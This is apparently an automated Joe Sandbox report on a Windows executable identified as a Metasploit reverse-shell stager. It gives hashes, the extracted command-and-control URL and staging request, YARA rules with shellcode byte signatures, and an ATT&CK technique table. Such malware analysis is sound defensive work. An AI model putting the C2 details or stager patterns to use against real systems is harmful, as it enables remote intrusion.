
Windows Analysis Report
443_2003_https-df.exe

Overview

General Information

Sample name: 443_2003_https-df.exe
Analysis ID: 1636969
MD5: 8d9c0f42baf129d1b430a01463dd7870
SHA1: 4054be8879b458c034340b19311baa42218c216d
SHA256: b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
Tags: exe, malware, Rozena, user-Joker

Detection

Metasploit
Score: 96
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
AV process strings found (often used to terminate AV products)
Entry point lies outside standard sections
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • 443_2003_https-df.exe (PID: 2820 cmdline: "C:\Users\user\Desktop\443_2003_https-df.exe" MD5: 8D9C0F42BAF129D1B430A01463DD7870)
    • WerFault.exe (PID: 1412 cmdline: C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
{"Type": "Metasploit Connect", "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"}
Source | Rule | Description | Author | Strings
443_2003_https-df.exe | JoeSecurity_MetasploitPayload_2 | Yara detected Metasploit Payload | Joe Security
443_2003_https-df.exe | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
443_2003_https-df.exe | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x18db:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
443_2003_https-df.exe | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Source | Rule | Description | Author | Strings
00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5

Source | Rule | Description | Author | Strings
0.0.443_2003_https-df.exe.140000000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
0.0.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
0.0.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
0.2.443_2003_https-df.exe.140000000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
0.2.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5

No Sigma rule has matched
No Suricata rule has matched

              AV Detection

Source: 443_2003_https-df.exe | Avira: detected
Source: 443_2003_https-df.exe | Malware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"}
Source: 443_2003_https-df.exe | Virustotal: Detection: 78%
Source: 443_2003_https-df.exe | ReversingLabs: Detection: 84%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 74.82.86.0:443 -> 192.168.2.9:49683 version: TLS 1.2

              Networking

Source: Malware configuration extractor | URLs: http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1 | Host: cdn123.offseccdn.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Code function: 0_2_00000001400042B6 VirtualAlloc,InternetReadFile,0_2_00000001400042B6
Source: global traffic | DNS traffic detected: DNS query: good.com
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://good.com/
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160429536.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160712596.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000003.1076984923.00000000005DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.blackberry.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown | HTTPS traffic detected: 74.82.86.0:443 -> 192.168.2.9:49683 version: TLS 1.2

              System Summary

Source: 443_2003_https-df.exe, type: SAMPLE | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 443_2003_https-df.exe, type: SAMPLE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
Source: 443_2003_https-df.exe, type: SAMPLE | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 443_2003_https-df.exe, type: SAMPLE | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: classification engine | Classification label: mal96.troj.winEXE@2/6@1/1
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2820
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2c0a8481-0add-47fa-a8eb-a8d5161218d0
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 443_2003_https-df.exe | Virustotal: Detection: 78%
Source: 443_2003_https-df.exe | ReversingLabs: Detection: 84%
Source: unknown | Process created: C:\Users\user\Desktop\443_2003_https-df.exe "C:\Users\user\Desktop\443_2003_https-df.exe"
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 443_2003_https-df.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: initial sample | Static PE information: section where entry point is pointing to: .jcho
Source: 443_2003_https-df.exe | Static PE information: real checksum: 0xfa97 should be: 0xfc4f
Source: 443_2003_https-df.exe | Static PE information: section name: .jcho
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: Amcache.hve.3.dr | Binary or memory string: VMware
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual USB Mouse
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.000000000055A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@(Z%SystemRoot%\system32\mswsock.dllkk
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.3.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.dr | Binary or memory string: MsMpEng.exe

              Remote Access Functionality

              Source: Yara match; File source: 443_2003_https-df.exe, type: SAMPLE
              Source: Yara match; File source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match; File source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
              MITRE ATT&CK techniques by tactic (numbers in parentheses are the report's signature-match counts for that technique):

              Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names
              Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server
              Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts
              Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron
              Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook
              Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook
              Defense Evasion: Process Injection (1), DLL Side-Loading (1), Obfuscated Files or Information, Binary Padding
              Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS
              Discovery: Security Software Discovery (11), System Information Discovery (1), Query Registry, System Network Configuration Discovery
              Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model
              Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture
              Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (113), Ingress Tool Transfer (2)
              Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication
              Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction